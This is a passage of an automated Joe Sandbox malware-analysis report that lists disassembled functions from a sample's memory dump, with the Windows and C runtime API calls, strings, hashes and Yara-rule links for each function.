Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
Instruction ID: 89899596785edb27fb49f52772c08571e47c45f6205b7c0fe660faf5797ac589
Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
Instruction Fuzzy Hash: 1541E169B0DA22C1FB17BB12AC00675E296BF14B91F898535DE1E4B754EFBCE401C360

Function 00007FF741ED56D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF741ED56FF
_set_statfp.LIBCMT ref: 00007FF741ED571A
_set_statfp.LIBCMT ref: 00007FF741ED5736
_set_statfp.LIBCMT ref: 00007FF741ED5772

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
Instruction ID: 0e0715a6753a58501a399daefde03daa6b2912afb5cfd7915178b296de746e48
Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
Instruction Fuzzy Hash: 0611C43EE1C727C1F7563128E54137981617F453A2FEE8634EA7D065D6CEECA4404325

Function 00007FF741EBFE24 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 00007FF741EBFE41
GetMessageW.USER32 ref: 00007FF741EBFE58
TranslateMessage.USER32 ref: 00007FF741EBFE63
DispatchMessageW.USER32 ref: 00007FF741EBFE6E
WaitForSingleObject.KERNEL32 ref: 00007FF741EBFE7C

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Message$DispatchObjectPeekSingleTranslateWait
String ID:
API String ID: 3621893840-0
Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
Instruction ID: 1a7edcc8462befd6a778f550f3a126019ba0bc084525f2fd760c6dbda79ef093
Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
Instruction Fuzzy Hash: FBF04F39F2C466D2F721BB21E455A7AA251FFA4B06FC41130EA4E419949E6CE149C720

Function 00007FF741EC625C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF741EC6286
abort.LIBCMT ref: 00007FF741EC64EA

Strings

csm, xrefs: 00007FF741EC641A
csm, xrefs: 00007FF741EC62AB

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: __except_validate_context_recordabort
String ID: csm$csm
API String ID: 746414643-3733052814
Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
Instruction ID: 33d4ec89228d88100b74323c3a8a78157889e9a8007802d86164ac7e2f3521b9
Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
Instruction Fuzzy Hash: 0971F27A50C6A1C6D762BF25D84477EFBA1FB09B8AF448131DA4C07B89EB6CD490C710

Function 00007FF741EC80F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF741EC811B
_invalid_parameter_noinfo.LIBCMT ref: 00007FF741EC82ED

Strings

, xrefs: 00007FF741EC8276
*, xrefs: 00007FF741EC8221

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
Instruction ID: 0b0f8dd07d9918209b74a1f042714029394a0da8110a436aa99701d93aeacbef
Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
Instruction Fuzzy Hash: CB51DB3A84C622CAF76EBE248D4877CB7A1FB42F0AF941135C64941199EFBCD442C725

Function 00007FF741ED1758 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF741ED17CB
MultiByteToWideChar.KERNEL32 ref: 00007FF741ED1894
GetStringTypeW.KERNEL32 ref: 00007FF741ED18AE

Strings

$%s, xrefs: 00007FF741ED175A

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ByteCharMultiWide$StringType
String ID: $%s
API String ID: 3586891840-3791308623
Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
Instruction ID: c9d289ba0efb2ab1e6202d77e15c03850f6c1821230a62d2d41d3ba8dd7f46f8
Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
Instruction Fuzzy Hash: 4841A83AB18792C9EB52BF25D8016A9A391FB44BA9F8C0235DE2D077C5DF7CE4418350

Function 00007FF741EC66A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF741EC5210: abort.LIBCMT ref: 00007FF741EC5223

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF741EC674A
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF741EC6776

Strings

csm, xrefs: 00007FF741EC6876

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_recordabort
String ID: csm
API String ID: 2466640111-1018135373
Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
Instruction ID: bbdb4c92e3590aefc12d1bf30fa30298b16f39daa5992bf0e3be422942e3dd40
Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
Instruction Fuzzy Hash: 1551597A61C652C7D721BB16E84026FB7B4FB89B91F840134EA8D07B56EF78E461CB10

Function 00007FF741ED4360 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF741ED4446
WriteFile.KERNEL32 ref: 00007FF741ED4479
GetLastError.KERNEL32 ref: 00007FF741ED449B

Strings

U, xrefs: 00007FF741ED4424

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: U
API String ID: 2456169464-4171548499
Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
Instruction ID: f6cf832b2a9e4b187b1a14d75c02c0ca45b03cad7d2c8446dd30d1aa8b6c05e1
Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
Instruction Fuzzy Hash: C641C32661CA92C2EB21BF25E8047B9A7A0FB98795F844031EE4D87B44DFBCD441C750

Function 00007FF741EB90B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF741EB90D9
GetObjectW.GDI32 ref: 00007FF741EB9107
ReleaseDC.USER32 ref: 00007FF741EB91BB

Strings

, xrefs: 00007FF741EB9153

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ObjectRelease
String ID:
API String ID: 1429681911-3916222277
Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
Instruction ID: b1386e333605ed0ffdcdaf0e455c527d00a8d6e97ce671d915db368db56f47cc
Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
Instruction Fuzzy Hash: 02316C3970875296EB04BF16B808A2AB7A1F788FD2F814435EE4A43B54CF7CE049CB14

Function 00007FF741EAE870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,?,?,00007FF741EB317F,?,?,00001000,00007FF741E9E51D), ref: 00007FF741EAE8BB
CreateSemaphoreW.KERNEL32(?,?,?,00007FF741EB317F,?,?,00001000,00007FF741E9E51D), ref: 00007FF741EAE8CB
CreateEventW.KERNEL32(?,?,?,00007FF741EB317F,?,?,00001000,00007FF741E9E51D), ref: 00007FF741EAE8E4

Strings

Thread pool initialization failed., xrefs: 00007FF741EAE900

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
Instruction ID: 0d2bfe1dd6cb98500fa04a9a4e6c972e93e439d38ddd2661404fd2b549ae8a85
Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
Instruction Fuzzy Hash: 1121C936B1D612C6F711BF24D4447A97692FB84B49F9C8034CA0D0A295DFBE944587A4

Function 00007FF741EB85E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF741EB85EC
GetDeviceCaps.GDI32 ref: 00007FF741EB85FD
ReleaseDC.USER32 ref: 00007FF741EB860A

Strings

, xrefs: 00007FF741EB8610

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: CapsDeviceRelease
String ID:
API String ID: 127614599-3916222277
Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
Instruction ID: 26e8917050badf7f424c1ae36478512d8324874975876ba01e83f257b2affa9f
Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
Instruction Fuzzy Hash: C2E08C28B0C641D6FB0877B6B58943AA261AB8CBD1F968035DE1A43794DE3CD4844310

Function 00007FF741E9D1A8 Relevance: 6.2, APIs: 4, Instructions: 238timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNEL32 ref: 00007FF741E9D46C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9D554
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9D55A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9D560

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$FileTime
String ID:
API String ID: 1137671866-0
Opcode ID: 6a66750d7d38e285348c6a4672a5517d432b12a502a6a2b91e6f62eece89d76d
Instruction ID: 2044acab9ac274c34238d205b7384d574158437988b0da01eb62c4fbfc000878
Opcode Fuzzy Hash: 6a66750d7d38e285348c6a4672a5517d432b12a502a6a2b91e6f62eece89d76d
Instruction Fuzzy Hash: C1A1B266A2C7A2C1EB12FB65E8401EDA361FF86795F805131EA5C07A99DFBCE544C320

Function 00007FF741EB0548 Relevance: 6.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF741EB05FC
SetLastError.KERNEL32 ref: 00007FF741EB0697

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 47ce399c8b5a93a9ee7e183f504d796df39c479f65169f8ae0637efe197c3b7b
Instruction ID: f3d90543fa243fe5aa7adfddf8544e694c6ca1aae0069da84f01ec007977c540
Opcode Fuzzy Hash: 47ce399c8b5a93a9ee7e183f504d796df39c479f65169f8ae0637efe197c3b7b
Instruction Fuzzy Hash: 9051C376F18652D5FB01FB64D4442FCA321FB85B99F804231DA1C17B96EFA8E141C360

Function 00007FF741EB9D90 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF741EB9DBC
GetLastError.KERNEL32 ref: 00007FF741EB9E08
CreateDirectoryW.KERNEL32 ref: 00007FF741EB9F10
LocalFree.KERNEL32 ref: 00007FF741EB9F20

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
String ID:
API String ID: 1077098981-0
Opcode ID: 5a43cb7f5a8bc2b697eb0b834037522765625dc86c8d5e2913923eaf6a834e49
Instruction ID: 131071d2c414950840b8c2326e3aa794e627640b6ccab56ea1e0cf9422d4796d
Opcode Fuzzy Hash: 5a43cb7f5a8bc2b697eb0b834037522765625dc86c8d5e2913923eaf6a834e49
Instruction Fuzzy Hash: D8516936A1CB62C6E701FF61E8447AAB3A5FB84B85F900135EA4E57A54DF7CE444CB10

Function 00007FF741ECDB5C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF741ECDBAF
WideCharToMultiByte.KERNEL32 ref: 00007FF741ECDC81
GetLastError.KERNEL32 ref: 00007FF741ECDCA4
_invalid_parameter_noinfo.LIBCMT ref: 00007FF741ECDCD6

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
String ID:
API String ID: 4141327611-0
Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
Instruction ID: 3af2dfcdd40261e176dcc0d14c8d64e183e2c8c1bd4eaec60dbca062ac4017a4
Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
Instruction Fuzzy Hash: 1941D83990C662C6F72BBB10D840779E290FF80792F944131DA5D06AC5EFAED841E760

Function 00007FF741EA3980 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

MoveFileW.KERNEL32 ref: 00007FF741EA39BD
MoveFileW.KERNEL32 ref: 00007FF741EA3A34
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA3AEB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA3AF1

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: FileMove_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3823481717-0
Opcode ID: 47dbf0decc8272d9a7ae459b130201949f9107b8ec80fb87a20ec63cf3da1f82
Instruction ID: c640fc4a24a11fc901b7e9c46ef49f1d8cdb0bc10cb33b1f577a226cb888a8fc
Opcode Fuzzy Hash: 47dbf0decc8272d9a7ae459b130201949f9107b8ec80fb87a20ec63cf3da1f82
Instruction Fuzzy Hash: D041B166F18772C5FB01FFB5D8441ACA371BB44B95B845231DE6D16A99EFB8D041C310

Function 00007FF741ED0B78 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF741ECC45B), ref: 00007FF741ED0B91
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF741ECC45B), ref: 00007FF741ED0BF3
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF741ECC45B), ref: 00007FF741ED0C2D
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF741ECC45B), ref: 00007FF741ED0C57

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 1557788787-0
Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
Instruction ID: a5dc06125e15b36d872371f8d9f4a7894f90d1ff434c69df4399266be18fe287
Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
Instruction Fuzzy Hash: DC218235A1CB62C5E725BF127440029E6A4FB54BD1B8C4134DEAE23BA4DF7CE4528314

Function 00007FF741ECD440 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

